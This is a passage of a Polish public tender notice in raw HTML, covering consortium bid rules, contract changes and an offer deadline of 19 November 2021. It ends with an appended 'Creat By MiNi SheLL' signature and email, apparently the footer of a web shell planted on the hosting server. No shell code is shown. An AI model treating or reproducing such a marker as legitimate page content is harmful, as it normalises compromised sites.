dotyczą.<br/>Zobowiązanie podmiotu udostępniającego zasoby winno być sporządzone w postaci<br/>elektronicznej i opatrzone kwalifikowanym podpisem elektronicznym, podpisem osobistym lub<br/>podpisem zaufanym osoby uprawnionej do reprezentowania podmiotu udostępniającego zasoby<br/>lub kopii poświadczonej przez notariusza. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający, dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w<br/>ramach oferty wspólnej w rozumieniu art. 58 ustawy Pzp) pod warunkiem, że taka oferta<br/>spełniać będzie następujące wymagania:<br/>1) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego.<br/>2) Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z<br/>pełnomocnikiem, którego adres należy wpisać w Formularzu oferty.<br/>3) Pełnomocnictwo lub inny dokument (np. umowa konsorcjum, spółki cywilnej) z którego wynika<br/>takie pełnomocnictwo należy złożyć razem z ofertą.<br/>4) W odniesieniu do warunków określonych w pkt 7.2 SWZ, wymagania te muszą być spełnione<br/>wspólnie przez Wykonawców składających ofertę wspólną (nie musi ich spełniać osobno każdy z<br/>Wykonawców składających ofertę wspólną). Na ich potwierdzenie należy złożyć dokumenty<br/>określone w pkt 10.4 SWZ.<br/>5) Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie zgodne<br/>z treścią Załącznika Nr 4 do SWZ, aktualne na dzień składania ofert, celem potwierdzenia, że<br/>każdy z Wykonawców ubiegających się wspólnie o zamówienie nie podlega wykluczeniu z<br/>postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp oraz spełnia<br/>warunki udziału w postępowaniu określone w SWZ w zakresie, w którym każdy z nich wykazuje<br/>brak podstaw wykluczenia z postępowania oraz spełnia warunki udziału w postępowaniu.<br/>6) Każdy z Wykonawców występujących wspólnie obowiązany jest do wykazania braku podstaw<br/>do wykluczenia z postępowania o udzielenie zamówienia publicznego. W takim przypadku<br/>oświadczenia lub dokumenty wymienione w pkt 10.3 SWZ składa każdy z Wykonawców<br/>występujących wspólnie.<br/>7) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z wykonawców, którzy zrealizują te usługi, do realizacji których te zdolności są wymagane.<br/>W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika,<br/>które usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość zmian postanowień zawartej Umowy w stosunku do treści Oferty, na podstawie której dokonano wyboru Wykonawcy, w tym w zakresie wysokości wynagrodzenia umownego lub terminu obowiązywania umowy w przypadku zaistnienia, co najmniej jednej z okoliczności określonych w § 8 Wzoru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-19 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę oraz dokumenty lub oświadczenia składane razem z ofertą należy złożyć za pośrednictwem Platformy Zakupowej – zwanej dalej „Platformą” – pod adresem: http://www.przetargi.wody.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-19 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com